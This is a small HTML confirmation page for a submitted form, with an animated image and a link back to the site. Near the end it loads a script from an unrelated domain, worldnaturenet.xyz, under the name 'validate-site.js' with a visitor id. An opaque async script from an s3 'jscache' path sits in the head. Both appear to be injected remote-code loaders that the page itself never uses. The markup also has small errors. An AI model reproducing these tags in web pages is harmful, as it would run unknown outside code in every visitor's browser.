<!DOCTYPE html>
<html lang="en-NZ">
<head>
 <meta charset="UTF-8" />
 <title>Form Submitted</title>

 <!-- CSS  -->
 <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
 <link href="css/materialize.css" type="text/css" rel="stylesheet" media="screen,projection"/>
 <link href="css/style.css" type="text/css" rel="stylesheet" media="screen,projection"/>

 <link rel="icon"
   href="images/icon.ico"/>


  <script src="https://unpkg.com/react@15.3.2/dist/react.js"></script>
    <script src="https://unpkg.com/react-dom@15.3.2/dist/react-dom.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.8.23/browser.min.&#10;js"></script>
  <script type="text/javascript" async="" src="//s3.amazonaws.com/jscache/16a168f0af2da0c3c2.js"></script>

<style>
@keyframes bounceInDown-radium-animation-bcb83dda {
from{animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);}
0%{opacity: 0;
transform: translate3d(0, -3000px, 0);}
60%{animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
opacity: 1;
transform: translate3d(0, 25px, 0);}
75%{animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
transform: translate3d(0, -10px, 0);}
90%{animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
transform: translate3d(0, 5px, 0);}
to{animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
transform: none;}
}


</style>

</head>
<body>
  <br>
  <center><img id="myImg" src="images/form.jpg" data-radium="true" style="animation: bounceInDown-radium-animation-bcb83dda 3s; max-width:100%; width: 600px; font-size: 4s0px; margin: 0px auto; color: rgb(196, 0, 0);">
    </h1></center>
  <br>
  <br>
  <center><a href="index.html" id="download-button" class="btn-large waves-effect waves-light indigo lighten-1">Back to site</a></center>






 <div id="container">


   <script src="https://code.jquery.com/jquery-2.1.1.min.js"></script>
   <script src="js/materialize.js"></script>
   <script src="js/init.js"></script>


 <script type="text/javascript" src="https://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&amp;r=19"></script>




</body>
</html>
